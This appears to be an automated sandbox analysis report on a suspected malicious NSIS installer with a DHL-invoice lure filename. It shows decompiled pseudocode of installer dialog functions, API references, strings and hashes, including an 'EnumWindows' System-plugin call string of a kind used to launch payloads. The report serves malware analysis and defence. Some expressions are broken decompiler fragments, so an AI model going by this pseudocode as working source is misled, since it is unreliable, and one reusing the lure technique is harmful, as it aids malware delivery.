					_t333 =  !=  ? _a16 : 1;
					if(0x40f == 0x4e) {
						L26:
						if(_t282 == 0x413) {
							L28:
							_t320 = _t333;
							_t275 = _t158;
							_t348 = _t282;
							if(( *0x435a0c & 0x00000200) == 0 && (_t282 == 0x413 ||  *((intOrPtr*)(_t333 + 8)) == 0xfffffffe)) {
								_t313 = E004056DA(_v80, 0 | _t282 != 0x413);
								_t320 = _t333;
								_a8 = _t313;
								_t275 = _a4;
								_t348 = _v68;
								if(_t313 >= 0) {
									_t314 = _t313 * 0x818;
									_a8 = _t314;
									_t315 =  *(_t314 + _v72 + 8);
									_t320 = _t333;
									if((_t315 & 0x00000010) == 0) {
										if((_t315 & 0x00000040) == 0) {
											_t316 = _t315 ^ 1;
										} else {
											_t316 =  ==  ? (_t315 ^ 0x00000080) & 0xfffffffe : _t315 ^ 0x00000080 | 0x00000001;
										}
										_t278 = _a16;
										 *(_a8 + _v72 + 8) = _t316;
										E00401221(_t278);
										_t275 = _t278 + 1;
										_t320 =  !( *0x435a0c >> 8) & 1;
										_t348 = 0x40f;
									}
								}
							}
							if(_t333 != 0) {
								_t214 =  *((intOrPtr*)(_t333 + 8));
								if(_t214 == 0xfffffe3d) {
									SendMessageW(_v80, 0x419, 0,  *(_t333 + 0x5c));
									_t214 =  *((intOrPtr*)(_t333 + 8));
								}
								if(_t214 == 0xfffffe39) {
									_t296 =  *(_t333 + 0x5c) * 0x818;
									_t312 = _v72;
									_t215 =  *(_t296 + _t312 + 8);
									if( *((intOrPtr*)(_t333 + 0xc)) != 2) {
										_t216 = _t215 & 0xffffffdf;
									} else {
										_t216 = _t215 | 0x00000020;
									}
									 *(_t296 + _t312 + 8) = _t216;
								}
							}
							L45:
							_t159 = _t275;
							_t283 = _t320;
							_a16 = _t159;
							_t334 = _t348;
							_a8 = _t283;
							_t306 = 8;
							if(_t348 != 0x111) {
								_t320 = _t283;
								_t275 = _t159;
								_t349 = _t334;
								if(_t334 != 0x200) {
									_t160 = _t349;
									if(_t349 != 0x40b) {
										_a8 = _t320;
										_t349 = _t160;
										_v60 = _t275;
										_a16 = _t349;
										if(_t160 != 0x40f) {
											L88:
											if(_t349 == 0x420 && ( *0x435a0c & 0x00000100) != 0) {
												_t336 =  ==  ? _t306 : 0;
												ShowWindow(_v80, _t336);
												ShowWindow(GetDlgItem(_a4, 0x3fe), _t336);
											}
											L91:
											return E0040575B(_t349, _t275, _t320);
										}
										_t337 = 0;
										L63:
										E004012DD(_t337, _t337);
										if(_t275 != 0) {
											_t196 =  ==  ? _t275 : _t275 - 1;
											_push( ==  ? _t275 : _t275 - 1);
											_push(8);
											E004054B6();
										}
										if(_t320 == 0) {
											L71:
											E004012DD(_t337, _t337);
											_t285 =  *0x435a2c;
											_t167 =  *0x42ed6c; // 0x0
											_a4 = _t337;
											_t338 =  *0x435a28;
											_v52 = 0xf030;
											if(_t285 <= 0) {
												L83:
												if( *0x435afe == 0x400) {
													InvalidateRect(_v80, 0, 1);
												}
												if( *((intOrPtr*)( *0x4349e0 + 0x10)) != 0) {
													_t170 = E00405835(5);
													_push(0);
													E00405560(_t285, 0x3ff, 0xfffffffb, _t170);
												}
												_t306 = 8;
												goto L88;
											}
											_t276 = _a12;
											_t340 = _t338 + 8;
											_t321 = _v80;
											_t350 = _t167;
											do {
												_t175 =  *((intOrPtr*)(_t350 + _t276 * 4));
												_a12 = _t175;
												if(_t175 != 0) {
													_t307 =  *_t340;
													_v52 = _t175;
													_v56 = 8;
													if((_t307 & 0x00000100) != 0) {
														_v56 = 9;
														_v40 =  &(_t340[4]);
														 *_t340 =  *_t340 & 0xfffffeff;
														_a12 = _v52;
													}
													if((_t307 & 0x00000040) == 0) {
														_t288 = (_t307 & 1) + 1;
														if((_t307 & 0x00000010) != 0) {
															_t288 = _t288 + 3;
														}
													} else {
														_t288 = 3;
													}
													_v48 = (_t288 << 0x0000000b | _t307 & 0x00000008) + (_t288 << 0x0000000b | _t307 & 0x00000008) | _t307 & 0x00000020;
													SendMessageW(_t321, 0x1102, (_t307 >> 0x00000005 & 1) + 1, _a12);
													SendMessageW(_t321, 0x113f, 0,  &_v56);
													_t285 =  *0x435a2c;
												}
												_t276 = _t276 + 1;
												_t340 =  &(_t340[0x206]);
											} while (_t276 < _t285);
											_t320 = _a8;
											_t275 = _v60;
											_t349 = _a16;
											goto L83;
										} else {
											_t320 = E004011A0( *0x42ed6c);
											_a4 = _t320;
											E00401290(_t320);
											_t293 = _t337;
											_t311 = _t337;
											if(_t320 <= 0) {
												L70:
												SendMessageW(_v68, 0x14e, _t293, _t337);
												_t349 = 0x420;
												_a16 = 0x420;
												goto L71;
											}
											do {
												_t194 =  ==  ? _t293 : _t293 + 1;
												_t311 = _t311 + 1;
												_t293 =  ==  ? _t293 : _t293 + 1;
											} while (_t311 < _t320);
											_t337 = 0;
											goto L70;
										}
									}
									_t198 =  *0x42ed70; // 0x0
									if(_t198 != 0) {
										ImageList_Destroy(_t198);
									}
									_t199 =  *0x42ed6c; // 0x0
									if(_t199 != 0) {
										GlobalFree(_t199);
									}
									 *0x42ed70 = 0;
									 *0x42ed6c = 0;
									 *0x435ab8 = 0;
									goto L91;
								}
								SendMessageW(_v80, 0x200, 0, 0);
								_t320 = _a8;
								_t275 = _a16;
								goto L91;
							}
							if(_t275 != 0x3f9 || _t275 >> 0x10 != 1) {
								goto L91;
							} else {
								_t342 = _v68;
								_t209 = SendMessageW(_t342, 0x147, 0, 0);
								if(_t209 == 0xffffffff) {
									goto L91;
								}
								_t277 = SendMessageW;
								_t343 = SendMessageW(_t342, 0x150, _t209, 0);
								if(_t343 == 0xffffffff ||  *((intOrPtr*)(_v64 + 0x94 + _t343 * 4)) == 0) {
									_t343 = 0x20;
								}
								E00401290(_t343);
								_t337 = 0;
								SendMessageW(_v0, 0x420, 0, _t343);
								_t275 = _t277 | 0xffffffff;
								_a4 = 0;
								_t349 = 0x40f;
								_v64 = _t275;
								_t320 = 0;
								_a12 = 0x40f;
								goto L63;
							}
						}
						_t320 = _t333;
						_t275 = _t158;
						_t348 = _t282;
						if( *((intOrPtr*)(_t333 + 4)) != 0x408) {
							goto L45;
						}
						goto L28;
					}
					_t320 = 1;
					_t275 = _t158;
					_t348 = 0x40f;
					if(0x40f != 0x413) {
						goto L45;
					}
					goto L26;
				} else {
					_v76 = 0;
					_t326 = 2;
					 *0x435ab8 = _t330;
					 *0x42ed6c = GlobalAlloc(0x40,  *0x435a2c << 2);
					_t235 = LoadImageW( *0x4349f4, 0x6e, 0, 0, 0, 0);
					 *0x42ed68 =  *0x42ed68 | 0xffffffff;
					_t344 = _t235;
					 *0x42dd64 = SetWindowLongW(_t347, 0xfffffffc, E004058D0);
					_t238 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x42ed70 = _t238;
					ImageList_AddMasked(_t238, _t344, 0xff00ff);
					SendMessageW(_t347, 0x1109, _t326,  *0x42ed70);
					if(SendMessageW(_t347, 0x111c, 0, 0) < 0x10) {
						SendMessageW(_t347, 0x111b, 0x10, 0);
					}
					DeleteObject(_t344);
					_t352 = _v72;
					_t301 = 0;
					_t345 = 0;
					do {
						_t245 =  *((intOrPtr*)(_v68 + 0x94 + _t345 * 4));
						if(_t245 != 0) {
							_push(_t245);
							_push(_t301);
							SendMessageW(_t352, 0x151, SendMessageW(_t352, 0x143, 0, E00405EBA()), _t345);
							_t270 =  ==  ? _t326 : 0;
							_t301 = 0;
							_t326 =  ==  ? _t326 : 0;
						}
						_t345 = _t345 + 1;
					} while (_t345 < 0x21);
					_t279 = _a12;
					_v64 = _t326;
					_push( *((intOrPtr*)(_t279 + 0x30 + _t326 * 4)));
					_push(0x15);
					E0040551A(_v0);
					_push( *((intOrPtr*)(_t279 + 0x34 + _t326 * 4)));
					_push(0x16);
					E0040551A(_v0);
					_t354 = _v108;
					_t302 = 0;
					_t280 = 0;
					_t346 = 0;
					if( *0x435a2c <= 0) {
						L19:
						SetWindowLongW(_t354, 0xfffffff0, GetWindowLongW(_t354, 0xfffffff0) & 0xfffffffb);
						goto L20;
					} else {
						_t329 = _t355[6] + 0x18;
						do {
							if( *_t329 == _t302) {
								L16:
								_t253 = _v96;
								goto L17;
							}
							_t319 = 0x20;
							_v76 = _t280;
							_v72 = 0xffff0002;
							_v68 = 0xd;
							_v56 = _t319;
							_t355[0x15] = _t346;
							_v52 = _t329;
							_v60 =  *(_t329 - 0x10) & _t319;
							if(( *(_t329 - 0x10) & 0x00000002) == 0) {
								if(( *(_t329 - 0x10) & 0x00000004) == 0) {
									_t257 = SendMessageW(_t354, 0x1132, _t302,  &_v76);
									_t303 =  *0x42ed6c; // 0x0
									 *(_t303 + _t346 * 4) = _t257;
								} else {
									_t280 = SendMessageW(_t354, 0x110a, 3, _t280);
								}
								_t302 = 0;
								goto L16;
							}
							_v68 = 0x4d;
							_t355[0x14] = 1;
							_t280 = SendMessageW(_t354, 0x1132, _t302,  &_v76);
							_t263 =  *0x42ed6c; // 0x0
							 *(_t263 + _t346 * 4) = _t280;
							_t253 = 1;
							_t302 = 0;
							_v96 = 1;
							L17:
							_t346 = _t346 + 1;
							_t329 = _t329 + 0x818;
						} while (_t346 <  *0x435a2c);
						if(_t253 != 0) {
							L20:
							if(_v80 != 0) {
								_push(_t354);
							} else {
								_t327 = _v88;
								ShowWindow(_t327, 5);
								_push(_t327);
							}
							E00405503();
							goto L24;
						}
						goto L19;
					}
				}
			}

0x0040441e
0x0040442f
0x0040443e
0x0040444a
0x00404451
0x0040445a
0x00404468
0x0040446c
0x00404698
0x004046a4
0x004046af
0x004046b3
0x004046bb
0x004046c3
0x004046ce
0x004046de
0x004046e0
0x004046f5
0x004046ff
0x00404701
0x00404703
0x00404705
0x0040472e
0x00404734
0x00404736
0x0040473a
0x0040473c
0x00404740
0x00404746
0x0040474c
0x00404750
0x00404754
0x00404759
0x0040475e
0x0040477b
0x00404760
0x00404773
0x00404773
0x00404785
0x0040478a
0x0040478e
0x004047a1
0x004047a2
0x004047a4
0x004047a4
0x00404759
0x00404740
0x004047ab
0x004047ad
0x004047b5
0x004047c6
0x004047cc
0x004047cc
0x004047d4
0x004047d6
0x004047e1
0x004047e5
0x004047e9
0x004047f0
0x004047eb
0x004047eb
0x004047eb
0x004047f3
0x004047f3
0x004047d4
0x004047f7
0x004047f7
0x004047f9
0x004047fb
0x004047ff
0x00404801
0x00404807
0x0040480e
0x004048a9
0x004048ab
0x004048b2
0x004048b6
0x004048d4
0x004048dc
0x00404914
0x00404918
0x0040491a
0x0040491e
0x00404927
0x00404ae0
0x00404ae6
0x00404af9
0x00404b01
0x00404b18
0x00404b18
0x00404b1e
0x00404b2d
0x00404b2d
0x0040492d
0x0040492f
0x00404931
0x00404938
0x00404940
0x00404943
0x00404944
0x00404946
0x00404946
0x0040494d
0x004049a3
0x004049a5
0x004049aa
0x004049b0
0x004049b5
0x004049b9
0x004049bf
0x004049c9
0x00404a9f
0x00404aad
0x00404ab8
0x00404ab8
0x00404ac6
0x00404aca
0x00404acf
0x00404ad8
0x00404ad8
0x00404adf
0x00000000
0x00404adf
0x004049cf
0x004049d3
0x004049d6
0x004049da
0x004049dc
0x004049dc
0x004049e0
0x004049e6
0x004049ec
0x004049ee
0x004049f2
0x00404a00
0x00404a05
0x00404a0d
0x00404a11
0x00404a1b
0x00404a1b
0x00404a22
0x00404a30
0x00404a34
0x00404a36
0x00404a36
0x00404a24
0x00404a26
0x00404a26
0x00404a56
0x00404a64
0x00404a78
0x00404a7e
0x00404a7e
0x00404a84
0x00404a85
0x00404a8b
0x00404a93
0x00404a97
0x00404a9b
0x00000000
0x0040494f
0x0040495a
0x0040495d
0x00404961
0x00404966
0x00404968
0x0040496c
0x00404989
0x00404994
0x0040499a
0x0040499f
0x00000000
0x0040499f
0x00404972
0x0040497d
0x00404980
0x00404981
0x00404983
0x00404987
0x00000000
0x00404987
0x0040494d
0x004048de
0x004048e5
0x004048e8
0x004048e8
0x004048ee
0x004048f5
0x004048f8
0x004048f8
0x00404900
0x00404905
0x0040490a
0x00000000
0x0040490a
0x004048c1
0x004048c7
0x004048cb
0x00000000
0x004048cb
0x0040481c
0x00000000
0x00404833
0x00404833
0x00404841
0x0040484a
0x00000000
0x00000000
0x00404850
0x00404862
0x00404867
0x00404878
0x00404878
0x0040487a
0x00404880
0x0040488c
0x0040488e
0x00404891
0x00404895
0x0040489a
0x0040489e
0x004048a0
0x00000000
0x004048a0
0x0040481c
0x004046e9
0x004046eb
0x004046ed
0x004046ef
0x00000000
0x00000000
0x00000000
0x004046ef
0x004046d0
0x004046d2
0x004046d4
0x004046d8
0x00000000
0x00000000
0x00000000
0x00404472
0x00404472
0x0040447d
0x00404484
0x00404490
0x004044a3
0x004044a9
0x004044b0
0x004044c0
0x004044d0
0x004044dd
0x004044e2
0x004044f5
0x00404506
0x00404513
0x00404513
0x00404516
0x0040451c
0x00404520
0x00404522
0x00404524
0x00404528
0x00404531
0x00404533
0x00404534
0x0040454e
0x00404555
0x00404558
0x0040455a
0x0040455a
0x0040455c
0x0040455d
0x00404562
0x0040456a
0x0040456e
0x00404572
0x00404575
0x0040457a
0x0040457e
0x00404581
0x00404586
0x0040458a
0x0040458c
0x0040458e
0x00404596
0x00404665
0x00404675
0x00000000
0x0040459c
0x004045a0
0x004045a3
0x004045a6
0x0040464a
0x0040464a
0x00000000
0x0040464a
0x004045b1
0x004045b4
0x004045bc
0x004045c4
0x004045cc
0x004045d0
0x004045d4
0x004045d8
0x004045dc
0x00404618
0x00404639
0x0040463f
0x00404645
0x0040461a
0x00404629
0x00404629
0x00404648
0x00000000
0x00404648
0x004045e0
0x004045e9
0x004045ff
0x00404601
0x00404606
0x0040460b
0x0040460c
0x0040460e
0x0040464e
0x0040464e
0x0040464f
0x00404655
0x00404663
0x0040467b
0x00404680
0x00404692
0x00404682
0x00404682
0x00404689
0x0040468f
0x0040468f
0x00404693
0x00000000
0x00404693
0x00000000
0x00404663
0x00404596

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404436
GetDlgItem.USER32(?,00000408), ref: 00404442
GlobalAlloc.KERNEL32(00000040,?), ref: 0040448A
LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 004044A3
SetWindowLongW.USER32(00000000,000000FC,Function_000058D0), ref: 004044BA
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004044D0
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004044E2
SendMessageW.USER32(00000000,00001109,00000002), ref: 004044F5
SendMessageW.USER32(00000000,0000111C,00000000,00000000), ref: 00404501
SendMessageW.USER32(00000000,0000111B,00000010,00000000), ref: 00404513
DeleteObject.GDI32(00000000), ref: 00404516
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404544
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 0040454E
SendMessageW.USER32(?,00001132,00000000,?), ref: 004045F9
SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404623
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404639
GetWindowLongW.USER32(?,000000F0), ref: 00404668
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404675
ShowWindow.USER32(?,00000005), ref: 00404689
SendMessageW.USER32(?,00000419,00000000,?), ref: 004047C6
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404841
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404860
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 0040488C
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004048C1
ImageList_Destroy.COMCTL32(00000000), ref: 004048E8
GlobalFree.KERNEL32(00000000), ref: 004048F8

Strings

M, xrefs: 004045E0

Memory Dump Source

Source File: 00000000.00000002.11457610037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11457556627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457683931.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11458191200.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL_#U53d1#U7968.jbxd

Similarity

API ID: MessageSend$ImageWindow$List_Long$GlobalItem$AllocCreateDeleteDestroyFreeLoadMaskedObjectShow
String ID: M
API String ID: 1688767230-3664761504
Opcode ID: 593f695f4e0e7a559147944b019e1e190396842a77f5fef561b0bfd50dce2793
Instruction ID: 0c70e663620b203d4295ddec51a1238c6828a203a6db769dd6a487d059f7c121
Opcode Fuzzy Hash: 593f695f4e0e7a559147944b019e1e190396842a77f5fef561b0bfd50dce2793
Instruction Fuzzy Hash: D812CEB1604301AFD7209F24DC85A6BB7E9EBC8314F104A3EFA95E72E1D7789C018B59

Uniqueness

Uniqueness Score: -1.00%

Function 00404085 Relevance: 33.5, APIs: 11, Strings: 8, Instructions: 281
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E00404085(void* __ebx, void* __ebp, struct HWND__* _a4, unsigned int _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v4;
				WCHAR* _v8;
				intOrPtr _v12;
				intOrPtr _v24;
				signed int _v28;
				struct HWND__* _v32;
				unsigned int _v36;
				signed int _v40;
				long _v48;
				unsigned int _v52;
				signed int _v56;
				long _v64;
				long _v68;
				long _v72;
				unsigned int _v92;
				unsigned int _v96;
				unsigned int _t59;
				unsigned int _t61;
				unsigned int _t63;
				unsigned int _t65;
				unsigned int _t70;
				intOrPtr _t72;
				signed int _t85;
				unsigned int _t86;
				unsigned int _t89;
				signed int _t90;
				unsigned int _t92;
				unsigned int _t95;
				int _t98;
				unsigned int _t103;
				unsigned int _t108;
				unsigned int _t110;
				WCHAR* _t116;
				signed int _t117;
				unsigned int _t118;
				unsigned int _t120;
				short* _t122;
				struct HWND__* _t123;
				struct HWND__* _t124;
				unsigned int _t125;
				void* _t128;
				unsigned int _t134;
				unsigned int _t135;
				WCHAR* _t138;
				unsigned int _t139;
				void* _t140;
				unsigned int _t141;
				unsigned int _t142;
				intOrPtr _t143;
				unsigned int _t147;
				struct HWND__* _t149;
				long* _t150;

				_t150 =  &_v72;
				_t125 =  *0x42dd4c;
				_t135 = _a8;
				_t138 = L"user32::EnumWindows(i r1 ,i 0)" + ( *(_t125 + 0x3c) << 0xb);
				_v52 = _t125;
				if(_t135 != 0x40b) {
					__eflags = _t135 - 0x110;
					if(_t135 != 0x110) {
						__eflags = _t135 - 0x111;
						if(_t135 != 0x111) {
							L19:
							_t59 = _t135;
							__eflags = _t135 - 0x40f;
							if(__eflags == 0) {
								L21:
								_v56 = 0;
								E00406A3A(0x3fb, _t138);
								_t61 = E00406638(__eflags, _t138);
								_t116 = 0x42e568;
								_t147 = 1;
								__eflags = _t61;
								_t127 =  ==  ? 1 : 0;
								_v4 =  ==  ? 1 : 0;
								E00406B1A(0x42e568, _t138);
								_t63 = E004068E6(1);
								_v96 = _t63;
								__eflags = _t63;
								if(_t63 == 0) {
									L28:
									E00406B1A(_t116, _t138);
									_t65 = E00406BC5(_t116);
									__eflags = _t65;
									if(_t65 != 0) {
										__eflags = 0;
										 *_t65 = 0;
									}
									_t70 = GetDiskFreeSpaceW(_t116,  &_v68,  &_v64,  &_v72,  &_v48);
									__eflags = _t70;
									if(_t70 == 0) {
										_t139 = _v36;
										_t117 = _v40;
										_t147 = _v56;
										goto L35;
									} else {
										_t85 = MulDiv(_v68 * _v64, _v72, 0x400);
										asm("cdq");
										_t117 = _t85;
										_t139 = _t134;
										L33:
										_v40 = _t117;
										_v36 = _t139;
										L35:
										_t128 = E00405835(5);
										__eflags = _t147;
										if(_t147 == 0) {
											L40:
											_t118 = _a8;
											L41:
											_t72 =  *0x4349e0;
											__eflags =  *(_t72 + 0x10);
											if( *(_t72 + 0x10) != 0) {
												_push(0);
												E00405560(_t128, 0x3ff, 0xfffffffb, _t128);
												__eflags = _t147;
												if(_t147 == 0) {
													SetDlgItemTextW(_t150[0x19], 0x400, 0x4095b0);
												} else {
													_push(_v40);
													E00405560(_t128, 0x400, 0xfffffffc, _t150[0xd]);
												}
											}
											 *0x435ae4 = _t118;
											__eflags = _t118;
											if(_t118 == 0) {
												_t118 = E00401533(7);
											}
											_t140 = 0;
											__eflags =  *(_v52 + 0x14) & 0x00000400;
											_t141 =  ==  ? _t118 : _t140;
											__eflags = _t141;
											EnableWindow( *0x42dd54, 0 | _t141 == 0x00000000);
											__eflags = _t141;
											if(_t141 == 0) {
												__eflags =  *0x42dd60 - _t141;
												if( *0x42dd60 == _t141) {
													E0040553C();
												}
											}
											 *0x42dd60 =  *0x42dd60 & 0x00000000;
											__eflags =  *0x42dd60;
											goto L51;
										}
										__eflags = _t139;
										if(__eflags > 0) {
											goto L40;
										}
										if(__eflags < 0) {
											L39:
											_t118 = 2;
											goto L41;
										}
										__eflags = _t117 - _t128;
										if(_t117 >= _t128) {
											goto L40;
										}
										goto L39;
									}
								}
								_t120 = 0;
								__eflags = 0;
								while(1) {
									_t86 =  *_t63(0x42e568,  &_v40,  &_v64,  &_v48);
									__eflags = _t86;
									if(_t86 != 0) {
										break;
									}
									__eflags = _t120;
									if(_t120 != 0) {
										 *_t120 = _t86;
									}
									_t122 = E00406D10(0x42e568);
									 *_t122 = 0;
									_t120 = _t122 - 2;
									_t89 = 0x5c;
									 *_t120 = _t89;
									_t63 = _v92;
									__eflags = _t120 - 0x42e568;
									if(_t120 != 0x42e568) {
										continue;
									} else {
										_t116 = 0x42e568;
										goto L28;
									}
								}
								_t142 = _v52;
								_t117 = (_t142 << 0x00000020 | _v56) >> 0xa;
								_t139 = _t142 >> 0xa;
								__eflags = _t139;
								goto L33;
							}
							__eflags = _t59 - 0x405;
							if(__eflags != 0) {
								goto L51;
							}
							goto L21;
						}
						_t134 = _a12;
						_t90 = _t134 & 0x0000ffff;
						__eflags = _t90 - 0x3fb;
						if(_t90 != 0x3fb) {
							_t134 = 0x3e9;
							__eflags = _t90 - 0x3e9;
							if(_t90 != 0x3e9) {
								goto L19;
							}
							_t123 = _a4;
							_v28 = 0;
							_v4 = 0;
							_v32 = _t123;
							_v24 = 0x42bd48;
							_v12 = E00404F33;
							_v8 = _t138;
							_v28 = E00405EBA();
							_t92 =  &_v40;
							_v24 = 0x41;
							__imp__SHBrowseForFolderW(_t92, 0x42dd68,  *((intOrPtr*)(_t125 + 0x38)));
							__eflags = _t92;
							if(__eflags == 0) {
								L11:
								_t135 = 0x40f;
								goto L21;
							}
							__imp__CoTaskMemFree(_t92);
							E00406556(_t138);
							_t95 =  *( *0x435a10 + 0x11c);
							__eflags = _t95;
							if(_t95 != 0) {
								__eflags = _t138 - L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\mnstring";
								if(_t138 == L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\mnstring") {
									_push(_t95);
									_push(0);
									E00405EBA();
									_t98 = lstrcmpiW("Call", "Preblesses Setup: Installing");
									__eflags = _t98;
									if(_t98 != 0) {
										lstrcatW(_t138, "Call");
									}
								}
							}
							 *0x42dd60 =  *0x42dd60 + 1;
							__eflags =  *0x42dd60;
							SetDlgItemTextW(_t123, 0x3fb, _t138);
							goto L19;
						}
						__eflags = _t134 >> 0x10 - 0x300;
						if(__eflags != 0) {
							goto L19;
						}
						goto L11;
					} else {
						_t124 = _a4;
						_t149 = GetDlgItem(_t124, 0x3fb);
						_t103 = E00406E03(_t138);
						__eflags = _t103;
						if(_t103 != 0) {
							_t110 = E00406BC5(_t138);
							__eflags = _t110;
							if(_t110 == 0) {
								E00406556(_t138);
							}
						}
						 *0x4349dc = _t124;
						SetWindowTextW(_t149, _t138);
						_t143 = _a16;
						_push( *((intOrPtr*)(_t143 + 0x34)));
						_push("true");
						E0040551A(_t124);
						_push( *((intOrPtr*)(_t143 + 0x30)));
						_push(0x14);
						E0040551A(_t124);
						E00405503(_t149);
						_t108 = E004068E6(8);
						__eflags = _t108;
						if(_t108 != 0) {
							 *_t108(_t149, "true");
						}
						L51:
						goto L52;
					}
				} else {
					E00406A3A(0x3fb, _t138);
					E00406D3D(_t138);
					L52:
					return E0040575B(_t135, _a12, _a16);
				}
			}

0x00404085
0x00404088
0x00404090
0x0040409a
0x004040a0
0x004040aa
0x004040c4
0x004040ca
0x00404146
0x0040414c
0x00404231
0x00404231
0x00404233
0x00404239
0x00404246
0x0040424c
0x00404250
0x00404256
0x0040425d
0x00404264
0x00404265
0x00404268
0x0040426c
0x00404270
0x00404276
0x0040427b
0x0040427f
0x00404281
0x004042d5
0x004042d7
0x004042dd
0x004042e2
0x004042e4
0x004042e6
0x004042e8
0x004042e8
0x00404300
0x00404306
0x00404308
0x00404343
0x00404347
0x0040434b
0x00000000
0x0040430a
0x0040431d
0x00404323
0x00404324
0x00404326
0x00404339
0x00404339
0x0040433d
0x0040434f
0x00404356
0x00404358
0x0040435a
0x0040436b
0x0040436b
0x0040436f
0x0040436f
0x00404374
0x00404378
0x0040437a
0x00404384
0x00404389
0x0040438b
0x004043b1
0x0040438d
0x0040438d
0x0040439c
0x0040439c
0x0040438b
0x004043b6
0x004043bc
0x004043be
0x004043c7
0x004043c7
0x004043cf
0x004043d0
0x004043d7
0x004043dc
0x004043e8
0x004043ee
0x004043f0
0x004043f2
0x004043f8
0x004043fa
0x004043fa
0x004043f8
0x004043ff
0x004043ff
0x00000000
0x004043ff
0x0040435c
0x0040435e
0x00000000
0x00000000
0x00404360
0x00404366
0x00404368
0x00000000
0x00404368
0x00404362
0x00404364
0x00000000
0x00000000
0x00000000
0x00404364
0x00404308
0x00404283
0x00404283
0x00404285
0x00404299
0x0040429b
0x0040429d
0x00000000
0x00000000
0x004042a3
0x004042a5
0x004042a7
0x004042a7
0x004042b4
0x004042ba
0x004042bd
0x004042c0
0x004042c1
0x004042c4
0x004042c8
0x004042ce
0x00000000
0x004042d0
0x004042d0
0x00000000
0x004042d0
0x004042ce
0x0040432e
0x00404332
0x00404336
0x00404336
0x00000000
0x00404336
0x0040423b
0x00404240
0x00000000
0x00000000
0x00000000
0x00404240
0x00404152
0x00404156
0x00404159
0x0040415c
0x0040417b
0x00404180
0x00404183
0x00000000
0x00000000
0x0040418c
0x00404195
0x00404199
0x0040419d
0x004041a1
0x004041a9
0x004041b1
0x004041ba
0x004041be
0x004041c3
0x004041cb
0x004041d1
0x004041d3
0x00404171
0x00404171
0x00000000
0x00404171
0x004041d6
0x004041dd
0x004041e7
0x004041ed
0x004041ef
0x004041f1
0x004041f7
0x004041f9
0x004041fa
0x004041fb
0x0040420a
0x00404210
0x00404212
0x0040421a
0x0040421a
0x00404212
0x004041f7
0x0040421f
0x0040421f
0x0040422c
0x00000000
0x0040422c
0x00404168
0x0040416b
0x00000000
0x00000000
0x00000000
0x004040cc
0x004040cc
0x004040dd
0x004040df
0x004040e4
0x004040e6
0x004040e9
0x004040ee
0x004040f0
0x004040f3
0x004040f3
0x004040f0
0x004040fa
0x00404100
0x00404106
0x0040410a
0x0040410d
0x00404110
0x00404115
0x00404118
0x0040411b
0x00404121
0x00404128
0x0040412d
0x0040412f
0x00404138
0x00404138
0x00404406
0x00000000
0x00404407
0x004040ac
0x004040b2
0x004040b8
0x00404408
0x0040441b
0x0040441b

APIs

GetDlgItem.USER32(?,000003FB), ref: 004040D6
SetWindowTextW.USER32(00000000,?), ref: 00404100

Part of subcall function 00406A3A: GetDlgItemTextW.USER32(?,?,00000400,00404F4C), ref: 00406A4D

Part of subcall function 00406D3D: CharNextW.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403CB1,C:\Users\user\AppData\Local\Temp\,76383420,004039C2), ref: 00406DB2
Part of subcall function 00406D3D: CharNextW.USER32(?,?,?,00000000), ref: 00406DC1
Part of subcall function 00406D3D: CharNextW.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403CB1,C:\Users\user\AppData\Local\Temp\,76383420,004039C2), ref: 00406DC6
Part of subcall function 00406D3D: CharPrevW.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403CB1,C:\Users\user\AppData\Local\Temp\,76383420,004039C2), ref: 00406DDE

Strings

user32::EnumWindows(i r1 ,i 0), xrefs: 0040409A
hB, xrefs: 004042C8
C:\Users\user\AppData\Local\Temp\mnstring, xrefs: 004041F1
hB, xrefs: 0040425D
A, xrefs: 004041C3
Call, xrefs: 00404205, 00404214
hB, xrefs: 004042D0
Preblesses Setup: Installing, xrefs: 004041A1, 00404200

Memory Dump Source

Source File: 00000000.00000002.11457610037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

